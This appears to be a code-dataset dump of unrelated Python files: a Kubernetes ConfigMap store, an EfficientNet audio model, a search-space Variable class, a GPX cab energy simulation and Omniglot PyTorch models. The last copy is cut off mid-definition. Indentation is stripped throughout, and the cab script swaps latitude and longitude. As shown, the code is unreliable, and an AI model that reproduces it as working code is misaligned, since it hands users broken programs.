self.record_builder = record_builder
self.cm_api_version = cm_api_version
self.cm_kind = cm_kind
self.cm_data_field = cm_data_field
def __raise_error(self, operation, exception, config_map_name):
if isinstance(exception, DynamicApiError):
summary = exception.summary()
else:
summary = str(exception)
message = f'Failed to {operation} record for {self.stored_type_name} \'{config_map_name}\' as an error occurred: {summary}'
if isinstance(exception, NotFoundError):
raise RecordNotFoundError(message) from exception
elif isinstance(exception, BadRequestError):
raise InvalidRecordError(message) from exception
else:
raise PersistenceError(message) from exception
def build_record_reference(self, uid, record_name):
return {
'apiVersion': self.cm_api_version,
'kind': self.cm_kind,
'metadata': {
'name': record_name,
'namespace': self.storage_namespace,
'uid': uid
}
}
def get_record_uid(self, record_name):
record_cm = self.__get_config_map_for(record_name)
return record_cm.metadata.uid
def create(self, record_name, record_data, labels=None):
cm_config = self.__build_config_map_for_record(record_name, record_data, labels=labels)
try:
self.kube_api_ctl.create_object(cm_config, default_namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('create', e, record_name)
def update(self, record_name, record_data):
existing_cm = self.__get_config_map_for(record_name)
cm_config = self.__build_config_map_for_record(record_name, record_data, existing_cm=existing_cm)
try:
self.kube_api_ctl.update_object(cm_config, default_namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('update', e, record_name)
def __get_config_map_for(self, record_name):
try:
record_cm = self.kube_api_ctl.read_object(self.cm_api_version, self.cm_kind, record_name, namespace=self.storage_namespace)
return record_cm
except ApiException as e:
self.__raise_error('read', e, record_name)
def get(self, record_name):
record_cm = self.__get_config_map_for(record_name)
return self.__read_config_map_to_record(record_cm)
def delete(self, record_name):
try:
self.kube_api_ctl.delete_object(self.cm_api_version, self.cm_kind, record_name, namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('delete', e, record_name)
def __build_config_map_for_record(self, record_name, record_data, labels=None, existing_cm=None):
if labels == None:
labels = {}
if existing_cm is not None and existing_cm.metadata is not None and existing_cm.metadata.labels is not None:
merged_labels = {}
merged_labels.update(existing_cm.metadata.labels)
merged_labels.update(labels)
labels = merged_labels
cm_obj_config = {
ObjectAttributes.API_VERSION: self.cm_api_version,
ObjectAttributes.KIND: self.cm_kind,
ObjectAttributes.METADATA: {
ObjectAttributes.NAME: record_name,
ObjectAttributes.NAMESPACE: self.storage_namespace,
ObjectAttributes.LABELS: labels
},
self.cm_data_field: {
'record': self.record_builder.to_record(record_data)
}
}
return ObjectConfiguration(cm_obj_config)
def __read_config_map_to_record(self, config_map):
cm_data = config_map.data
record_data = cm_data.get('record')
return self.record_builder.from_record(record_data)
| none | 1 | 2.220463 | 2 | |
hearline/models/efficientnet_b0.py | ibkuroyagi/hear2021-submit | 0 | 6617421 | <filename>hearline/models/efficientnet_b0.py
"""EfficientNet."""
import logging
import torch
import torch.nn as nn
import torchaudio.transforms as T
from efficientnet_pytorch import EfficientNet
class EfficientNet_b0(nn.Module):
def __init__(
self,
sample_rate=16000,
n_fft=400,
hop_length=160,
n_mels=64,
n_embedding=512,
n_aug=None,
):
super(self.__class__, self).__init__()
self.spectrogram_extracter = T.MelSpectrogram(
sample_rate=sample_rate,
n_fft=n_fft,
win_length=n_fft,
hop_length=hop_length,
power=2.0,
n_mels=n_mels,
)
self.efficientnet = EfficientNet.from_name(
model_name="efficientnet-b0", in_channels=1
)
self.fc1 = nn.Linear(1280, n_embedding, bias=True)
self.layer_norm = torch.nn.LayerNorm(normalized_shape=n_embedding)
self.fc2 = torch.nn.Linear(n_embedding, n_embedding, bias=False)
self.sample_rate = sample_rate
self.scene_embedding_size = n_embedding
self.timestamp_embedding_size = n_embedding
self.n_timestamp = None
self.n_aug = n_aug
if n_aug is not None:
self.aug_fc = nn.Linear(n_embedding, n_aug, bias=True)
def forward(self, X):
"""X: (batch_size, T', mels)"""
# logging.info(f"X:{X.shape}")
if len(X.shape) == 2:
# X: (batch_size, wave_length)->(batch_size, T', mels)
X = self.spectrogram_extracter(X).transpose(1, 2)
x = X.unsqueeze(1) # (B, 1, T', mels)
x = self.efficientnet.extract_features(x)
# logging.info(f"x:{x.shape}")
x = x.max(dim=3)[0]
# logging.info(f"x:{x.shape}")
embedding_h = self.fc1(x.transpose(1, 2)).transpose(1, 2)
self.n_timestamp = embedding_h.shape[2]
# logging.info(f"embedding_h: {embedding_h.shape}")
embed = torch.tanh(self.layer_norm(embedding_h.max(dim=2)[0]))
embedding_z = self.fc2(embed)
output_dict = {
# (B, T', timestamp_embedding_size)
"framewise_embedding": embedding_h.transpose(1, 2),
# (B, scene_embedding_size)
"clipwise_embedding": embedding_h.max(dim=2)[0],
"embedding_z": embedding_z, # (B, n_embedding)
}
if self.n_aug is not None:
output_dict["aug_output"] = self.aug_fc(embed)
return output_dict
| <filename>hearline/models/efficientnet_b0.py
"""EfficientNet."""
import logging
import torch
import torch.nn as nn
import torchaudio.transforms as T
from efficientnet_pytorch import EfficientNet
class EfficientNet_b0(nn.Module):
def __init__(
self,
sample_rate=16000,
n_fft=400,
hop_length=160,
n_mels=64,
n_embedding=512,
n_aug=None,
):
super(self.__class__, self).__init__()
self.spectrogram_extracter = T.MelSpectrogram(
sample_rate=sample_rate,
n_fft=n_fft,
win_length=n_fft,
hop_length=hop_length,
power=2.0,
n_mels=n_mels,
)
self.efficientnet = EfficientNet.from_name(
model_name="efficientnet-b0", in_channels=1
)
self.fc1 = nn.Linear(1280, n_embedding, bias=True)
self.layer_norm = torch.nn.LayerNorm(normalized_shape=n_embedding)
self.fc2 = torch.nn.Linear(n_embedding, n_embedding, bias=False)
self.sample_rate = sample_rate
self.scene_embedding_size = n_embedding
self.timestamp_embedding_size = n_embedding
self.n_timestamp = None
self.n_aug = n_aug
if n_aug is not None:
self.aug_fc = nn.Linear(n_embedding, n_aug, bias=True)
def forward(self, X):
"""X: (batch_size, T', mels)"""
# logging.info(f"X:{X.shape}")
if len(X.shape) == 2:
# X: (batch_size, wave_length)->(batch_size, T', mels)
X = self.spectrogram_extracter(X).transpose(1, 2)
x = X.unsqueeze(1) # (B, 1, T', mels)
x = self.efficientnet.extract_features(x)
# logging.info(f"x:{x.shape}")
x = x.max(dim=3)[0]
# logging.info(f"x:{x.shape}")
embedding_h = self.fc1(x.transpose(1, 2)).transpose(1, 2)
self.n_timestamp = embedding_h.shape[2]
# logging.info(f"embedding_h: {embedding_h.shape}")
embed = torch.tanh(self.layer_norm(embedding_h.max(dim=2)[0]))
embedding_z = self.fc2(embed)
output_dict = {
# (B, T', timestamp_embedding_size)
"framewise_embedding": embedding_h.transpose(1, 2),
# (B, scene_embedding_size)
"clipwise_embedding": embedding_h.max(dim=2)[0],
"embedding_z": embedding_z, # (B, n_embedding)
}
if self.n_aug is not None:
output_dict["aug_output"] = self.aug_fc(embed)
return output_dict
| en | 0.534536 | EfficientNet. X: (batch_size, T', mels) # logging.info(f"X:{X.shape}") # X: (batch_size, wave_length)->(batch_size, T', mels) # (B, 1, T', mels) # logging.info(f"x:{x.shape}") # logging.info(f"x:{x.shape}") # logging.info(f"embedding_h: {embedding_h.shape}") # (B, T', timestamp_embedding_size) # (B, scene_embedding_size) # (B, n_embedding) | 2.288063 | 2 |
spaceopt/variable.py | ar-nowaczynski/spaceopt | 46 | 6617422 | <reponame>ar-nowaczynski/spaceopt<filename>spaceopt/variable.py
import random
from collections import Counter
from typing import Union
import pandas as pd
class Variable:
_ALLOWED_VTYPES = (float, int, str, bool)
def __init__(self, name: str, values: list) -> None:
self._verify_name(name)
self.name = name
self._verify_values(values)
self.values = values
self.vtype = self._get_vtype_from_values()
@property
def is_categorical(self) -> bool:
return self.vtype is str
def sample(self) -> Union[float, int, str, bool]:
return random.choice(self.values)
def encode(self, df: pd.DataFrame) -> pd.DataFrame:
if self.is_categorical:
encoding = dict(zip(self.values, range(len(self.values))))
df[self.name] = df[self.name].map(encoding)
return df
def decode(self, df: pd.DataFrame) -> pd.DataFrame:
if self.is_categorical:
decoding = dict(zip(range(len(self.values)), self.values))
df[self.name] = df[self.name].map(decoding)
return df
def _get_vtype_from_values(self) -> type:
vtypes = [type(value) for value in self.values]
cnt = Counter(vtypes)
if len(cnt) != 1:
value_types = "\n".join([f"{v} : {type(v)}" for v in self.values])
raise RuntimeError(
f"Multiple value types for a {self.__class__.__name__}"
f" named {repr(self.name)}"
f" with values={self.values}."
f" Encountered value types:\n{value_types}\n"
"All values should be of the same type."
f" Allowed value types: {self._ALLOWED_VTYPES}."
)
vtype = cnt.most_common()[0][0]
if vtype not in self._ALLOWED_VTYPES:
raise RuntimeError(
f"All values={self.values} for a {self.__class__.__name__}"
f" named {repr(self.name)}"
f" are of type {vtype}, which is not allowed."
f" Please use one of: {self._ALLOWED_VTYPES}."
)
return vtype
def _verify_name(self, name: str) -> None:
if not isinstance(name, str):
raise TypeError(
f"Invalid name={name} for a {self.__class__.__name__}."
f" Provided name is of type {type(name)},"
f" but it should be of type {str}."
)
def _verify_values(self, values: list) -> None:
if not isinstance(values, list):
raise TypeError(
f"{self.__class__.__name__} named {repr(self.name)}"
f" has values={values}"
f" of type {type(values)},"
f" but it should be of type {list}."
)
if len(values) == 0:
raise ValueError(
f"{self.__class__.__name__} named {repr(self.name)}"
" has an empty list of values."
)
def __str__(self) -> str:
indent = " " * 4
innerstr = [
f"name={repr(self.name)}",
f"values={self.values}",
f"vtype={self.vtype}",
f"is_categorical={self.is_categorical}",
]
innerstr = indent + (",\n" + indent).join(innerstr)
outstr = "{cls}(\n{innerstr}\n)".format(
cls=self.__class__.__name__,
innerstr=innerstr,
)
return outstr
| import random
from collections import Counter
from typing import Union
import pandas as pd
class Variable:
_ALLOWED_VTYPES = (float, int, str, bool)
def __init__(self, name: str, values: list) -> None:
self._verify_name(name)
self.name = name
self._verify_values(values)
self.values = values
self.vtype = self._get_vtype_from_values()
@property
def is_categorical(self) -> bool:
return self.vtype is str
def sample(self) -> Union[float, int, str, bool]:
return random.choice(self.values)
def encode(self, df: pd.DataFrame) -> pd.DataFrame:
if self.is_categorical:
encoding = dict(zip(self.values, range(len(self.values))))
df[self.name] = df[self.name].map(encoding)
return df
def decode(self, df: pd.DataFrame) -> pd.DataFrame:
if self.is_categorical:
decoding = dict(zip(range(len(self.values)), self.values))
df[self.name] = df[self.name].map(decoding)
return df
def _get_vtype_from_values(self) -> type:
vtypes = [type(value) for value in self.values]
cnt = Counter(vtypes)
if len(cnt) != 1:
value_types = "\n".join([f"{v} : {type(v)}" for v in self.values])
raise RuntimeError(
f"Multiple value types for a {self.__class__.__name__}"
f" named {repr(self.name)}"
f" with values={self.values}."
f" Encountered value types:\n{value_types}\n"
"All values should be of the same type."
f" Allowed value types: {self._ALLOWED_VTYPES}."
)
vtype = cnt.most_common()[0][0]
if vtype not in self._ALLOWED_VTYPES:
raise RuntimeError(
f"All values={self.values} for a {self.__class__.__name__}"
f" named {repr(self.name)}"
f" are of type {vtype}, which is not allowed."
f" Please use one of: {self._ALLOWED_VTYPES}."
)
return vtype
def _verify_name(self, name: str) -> None:
if not isinstance(name, str):
raise TypeError(
f"Invalid name={name} for a {self.__class__.__name__}."
f" Provided name is of type {type(name)},"
f" but it should be of type {str}."
)
def _verify_values(self, values: list) -> None:
if not isinstance(values, list):
raise TypeError(
f"{self.__class__.__name__} named {repr(self.name)}"
f" has values={values}"
f" of type {type(values)},"
f" but it should be of type {list}."
)
if len(values) == 0:
raise ValueError(
f"{self.__class__.__name__} named {repr(self.name)}"
" has an empty list of values."
)
def __str__(self) -> str:
indent = " " * 4
innerstr = [
f"name={repr(self.name)}",
f"values={self.values}",
f"vtype={self.vtype}",
f"is_categorical={self.is_categorical}",
]
innerstr = indent + (",\n" + indent).join(innerstr)
outstr = "{cls}(\n{innerstr}\n)".format(
cls=self.__class__.__name__,
innerstr=innerstr,
)
return outstr | none | 1 | 2.841173 | 3 | |
GeoDataCabSim.py | hornbartho/Vehicle-Simulation | 0 | 6617423 | import gpxpy
import matplotlib.pyplot as plt
import datetime
from geopy import distance
from geopy.distance import geodesic
from math import sqrt, floor, pi, sin
import numpy as np
import pandas as pd
import plotly.plotly as py
import plotly.graph_objs as go
import haversine
import math as mth
#########################################
g = 9.81
Weight = 380 + 170
Tire_Radius = 0.318
Cd = 0.825
Frontal_Area_Cab = 1.84*1.14
rho = 1.225
Vmax = 50
Vs = Vmax/3.6
effmotor = 0.785
effgearbox = 0.98
effelectrical = 0.9
Battery_Cap = 7.2
Pressure_Tire = 2.2
Average_Trip_Distance = 2
Change_In_Altitude = 20
Cab_Acceleration = 0.76
########################################
gpx_file = open('Test track.gpx', 'r')
gpx = gpxpy.parse(gpx_file)
data = gpx.tracks[0].segments[0].points
start = data[0]
finish = data[-1]
df = pd.DataFrame(columns=['lon', 'lat', 'alt', 'time'])
for point in data:
df = df.append({'lon': point.longitude, 'lat' : point.latitude, 'alt' : point.elevation, 'time' : point.time}, ignore_index=True)
Time_Seconds = np.linspace(0,len(df['alt'])-1,len(df['alt']))
Altitude = df['alt']
Longatude = df['lon']
Latitude = df['lat']
x = np.zeros(len(df))
i = 0
while i < len(df)-1:
Data_Now = (Longatude[i],Latitude[i])
Data_Next = (Longatude[i+1],Latitude[i+1])
x[i] = geodesic(Data_Now, Data_Next).meters
i += 1
Speed = x
Degree = np.zeros(len(df))
n = 0
while n < len(df)-1:
Ratio = (Altitude[n+1] - Altitude[n]) / x[n]
Degree[n] = ((mth.asin(Ratio))/((mth.pi)*2))*360
n += 1
Acceleration = np.zeros(len(df))
k = 0
while k < len(df)-1:
Difference = Speed[k+1] - Speed[k]
if Difference < 0:
Acceleration[k] = 0
elif Difference > 0.76:
Acceleration[k] = 0.76
else:
Acceleration[k] = Difference
k += 1
Crr = 0.005 + (1 / Pressure_Tire)*(0.01 + 0.0095*((Speed*3.6) / 100)**2)
theta = (Degree*pi)/180
FORCE_Rolling_Resistance = Crr*Weight*g
FORCE_Drag = 0.5*Cd*Frontal_Area_Cab*(rho*(Speed**2))
FORCE_Incline = Weight*g*theta
FORCE_Acceleration = Weight*Acceleration
FORCE_Resultant = FORCE_Rolling_Resistance + FORCE_Drag + FORCE_Incline + FORCE_Acceleration
TORQUE_Wheel = FORCE_Resultant*Tire_Radius
Radial_Wheel_Speed = Speed/Tire_Radius
eff = effmotor*effgearbox*effelectrical
Pout = TORQUE_Wheel*Radial_Wheel_Speed
Pin = (Pout/(eff))
Energy = np.sum(Pin)
plt.plot(Time_Seconds,Speed)
plt.show()
###############################################################################
| import gpxpy
import matplotlib.pyplot as plt
import datetime
from geopy import distance
from geopy.distance import geodesic
from math import sqrt, floor, pi, sin
import numpy as np
import pandas as pd
import plotly.plotly as py
import plotly.graph_objs as go
import haversine
import math as mth
#########################################
g = 9.81
Weight = 380 + 170
Tire_Radius = 0.318
Cd = 0.825
Frontal_Area_Cab = 1.84*1.14
rho = 1.225
Vmax = 50
Vs = Vmax/3.6
effmotor = 0.785
effgearbox = 0.98
effelectrical = 0.9
Battery_Cap = 7.2
Pressure_Tire = 2.2
Average_Trip_Distance = 2
Change_In_Altitude = 20
Cab_Acceleration = 0.76
########################################
gpx_file = open('Test track.gpx', 'r')
gpx = gpxpy.parse(gpx_file)
data = gpx.tracks[0].segments[0].points
start = data[0]
finish = data[-1]
df = pd.DataFrame(columns=['lon', 'lat', 'alt', 'time'])
for point in data:
df = df.append({'lon': point.longitude, 'lat' : point.latitude, 'alt' : point.elevation, 'time' : point.time}, ignore_index=True)
Time_Seconds = np.linspace(0,len(df['alt'])-1,len(df['alt']))
Altitude = df['alt']
Longatude = df['lon']
Latitude = df['lat']
x = np.zeros(len(df))
i = 0
while i < len(df)-1:
Data_Now = (Longatude[i],Latitude[i])
Data_Next = (Longatude[i+1],Latitude[i+1])
x[i] = geodesic(Data_Now, Data_Next).meters
i += 1
Speed = x
Degree = np.zeros(len(df))
n = 0
while n < len(df)-1:
Ratio = (Altitude[n+1] - Altitude[n]) / x[n]
Degree[n] = ((mth.asin(Ratio))/((mth.pi)*2))*360
n += 1
Acceleration = np.zeros(len(df))
k = 0
while k < len(df)-1:
Difference = Speed[k+1] - Speed[k]
if Difference < 0:
Acceleration[k] = 0
elif Difference > 0.76:
Acceleration[k] = 0.76
else:
Acceleration[k] = Difference
k += 1
Crr = 0.005 + (1 / Pressure_Tire)*(0.01 + 0.0095*((Speed*3.6) / 100)**2)
theta = (Degree*pi)/180
FORCE_Rolling_Resistance = Crr*Weight*g
FORCE_Drag = 0.5*Cd*Frontal_Area_Cab*(rho*(Speed**2))
FORCE_Incline = Weight*g*theta
FORCE_Acceleration = Weight*Acceleration
FORCE_Resultant = FORCE_Rolling_Resistance + FORCE_Drag + FORCE_Incline + FORCE_Acceleration
TORQUE_Wheel = FORCE_Resultant*Tire_Radius
Radial_Wheel_Speed = Speed/Tire_Radius
eff = effmotor*effgearbox*effelectrical
Pout = TORQUE_Wheel*Radial_Wheel_Speed
Pin = (Pout/(eff))
Energy = np.sum(Pin)
plt.plot(Time_Seconds,Speed)
plt.show()
###############################################################################
| de | 0.874044 | ######################################### ######################################## ############################################################################### | 2.642863 | 3 |
Omniglot/model.py | yaohungt/Demystifying_Self_Supervised_Learning | 21 | 6617424 | import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision.models.resnet import resnet18, resnet34, resnet50
class Model(nn.Module):
def __init__(self, feature_dim=128, resnet_depth=18):
super(Model, self).__init__()
self.f = []
if resnet_depth == 18:
my_resnet = resnet18()
resnet_output_dim = 512
elif resnet_depth == 34:
my_resnet = resnet34()
resnet_output_dim = 512
elif resnet_depth == 50:
my_resnet = resnet50()
resnet_output_dim = 2048
for name, module in my_resnet.named_children():
if name == 'conv1':
module = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
if not isinstance(module, nn.Linear) and not isinstance(module, nn.MaxPool2d):
self.f.append(module)
# encoder
self.f = nn.Sequential(*self.f)
# projection head
self.g = nn.Sequential(nn.Linear(resnet_output_dim, 512, bias=False), nn.BatchNorm1d(512),
nn.ReLU(inplace=True), nn.Linear(512, feature_dim, bias=True))
def forward(self, x):
x = self.f(x)
feature = torch.flatten(x, start_dim=1)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
# for 105x105 size
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=64, kernel_size=10, stride=1, padding=0), # out: 96
nn.BatchNorm2d(num_features=64),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 48
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=7, stride=1, padding=0), # out: 42
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 21
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 18
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 9
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 6
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
# for 28x28 size (using max_pool)
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x, norm=True):
feature = self.f(x)
out = self.g(feature)
if norm:
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
else:
return F.normalize(feature, dim=-1), out
# for 28x28 size (not using maxpool)
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0), # out: 3
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
# +
# for 28x28 size
class Lambda(nn.Module):
def __init__(self, func):
super(Lambda, self).__init__()
self.func = func
def forward(self, x):
return self.func(x)
class Recon_Omniglot_Model(nn.Module):
def __init__(self):
super(Recon_Omniglot_Model, self).__init__()
# reconstructer (approximately the inverse of the encoder)
self.f = nn.Sequential(
nn.Linear(1024, 9*128, bias=False),
nn.BatchNorm1d(num_features=9*128),
nn.ReLU(inplace=True), # (9*128 -> 3*3*128)
Lambda(lambda x: x.view(-1, 128, 3, 3)),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0,
output_padding=0, bias=False), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1,
output_padding=1, bias=False), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1,
output_padding=1, bias=False), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=1, kernel_size=3, stride=1, padding=1,
output_padding=0, bias=True), # out: 28
#nn.Sigmoid(),
)
def forward(self, x):
recon = self.f(x)
return recon
# -
# for 56x56 size
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 56
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 28
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
| import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision.models.resnet import resnet18, resnet34, resnet50
class Model(nn.Module):
def __init__(self, feature_dim=128, resnet_depth=18):
super(Model, self).__init__()
self.f = []
if resnet_depth == 18:
my_resnet = resnet18()
resnet_output_dim = 512
elif resnet_depth == 34:
my_resnet = resnet34()
resnet_output_dim = 512
elif resnet_depth == 50:
my_resnet = resnet50()
resnet_output_dim = 2048
for name, module in my_resnet.named_children():
if name == 'conv1':
module = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
if not isinstance(module, nn.Linear) and not isinstance(module, nn.MaxPool2d):
self.f.append(module)
# encoder
self.f = nn.Sequential(*self.f)
# projection head
self.g = nn.Sequential(nn.Linear(resnet_output_dim, 512, bias=False), nn.BatchNorm1d(512),
nn.ReLU(inplace=True), nn.Linear(512, feature_dim, bias=True))
def forward(self, x):
x = self.f(x)
feature = torch.flatten(x, start_dim=1)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
# for 105x105 size
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=64, kernel_size=10, stride=1, padding=0), # out: 96
nn.BatchNorm2d(num_features=64),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 48
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=7, stride=1, padding=0), # out: 42
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 21
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 18
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 9
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 6
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
# for 28x28 size (using max_pool)
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x, norm=True):
feature = self.f(x)
out = self.g(feature)
if norm:
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
else:
return F.normalize(feature, dim=-1), out
# for 28x28 size (not using maxpool)
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0), # out: 3
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
# +
# for 28x28 size
class Lambda(nn.Module):
def __init__(self, func):
super(Lambda, self).__init__()
self.func = func
def forward(self, x):
return self.func(x)
class Recon_Omniglot_Model(nn.Module):
def __init__(self):
super(Recon_Omniglot_Model, self).__init__()
# reconstructer (approximately the inverse of the encoder)
self.f = nn.Sequential(
nn.Linear(1024, 9*128, bias=False),
nn.BatchNorm1d(num_features=9*128),
